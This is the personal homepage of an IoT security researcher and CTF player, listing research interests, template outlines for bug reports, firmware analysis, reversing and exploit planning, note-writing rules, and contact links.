sondt / nosiaht

Hey, I'm sondt, also known as nosiaht.

IoT security research / bug hunting / CVEs / reversing / pwn

I hunt bugs, publish CVEs, work in (IoT) security research, and enjoy CTFs focused on Reverse Engineering and Binary Exploitation.

This page is intentionally plain: text first, no animation, no JavaScript, no tracking script, no decorative noise.

nosiaht.com blog email github x.com telegram 

+------------------+---------------------------+
| handle           | sondt / nosiaht           |
| domain           | IoT security research     |
| real-world work  | bug hunting, CVEs         |
| favorite puzzles | reversing, pwn            |
| page rule        | text survives everything  |
+------------------+---------------------------+

Now

Bug hunting lane
Looking for real bugs in real targets, turning fragile behavior into clear reports, repro steps, impact, and CVEs.
Research lane
Firmware internals, embedded services, web handlers, and weird implementation details in small devices.
CTF lane
Reverse the logic, understand the memory, write the exploit only after the model is clear.
Writing lane
Short notes with enough commands, offsets, assumptions, and proof for another person to reproduce the path.

Samples

CVE / bug hunting note

Input: product behavior / Output: report skeleton

target:      vendor-device-web-ui
surface:     authenticated handler, config import path
bug shape:   unsanitized input reaches privileged command wrapper
impact:      command execution in device context
proof:       minimal payload, logs, version, affected endpoint
next:        reduce noise, write clean repro, verify patched build

IoT firmware map

Input: firmware image / Output: quick research map

target: router-firmware.bin
extract: binwalk -> squashfs-root
first:  init scripts, web root, default config, exposed services
watch:  hardcoded secrets, command wrappers, writable paths
next:   map service entrypoints before forming exploit ideas

Reverse engineering scratchpad

Input: function cluster / Output: working hypothesis

function: sub_4018F0
role:     likely input parser
signals:  bounds check nearby, string table references, error-code caller
risk:     first names are often wrong
next:     rename by data flow, not by vibes

Binary exploitation note

Input: CTF binary / Output: exploit direction

binary:      chall
protections: NX enabled, PIE disabled, partial RELRO
bug class:   stack overflow candidate
plan:        find offset -> control RIP -> build ROP
next:        keep exact commands, offsets, libc, and payload shape

Note rules

  1. Show the artifact, target version, and affected surface first.
  2. Separate observed facts from guesses.
  3. Keep commands, offsets, payloads, and logs exact.
  4. Explain impact without hype.
  5. Prefer small reproducible samples over long vague explanations.

Contact

Email: [email protected]

GitHub: github.com/sondt99

Social: x.com/_sondt_

Telegram: t.me/sondt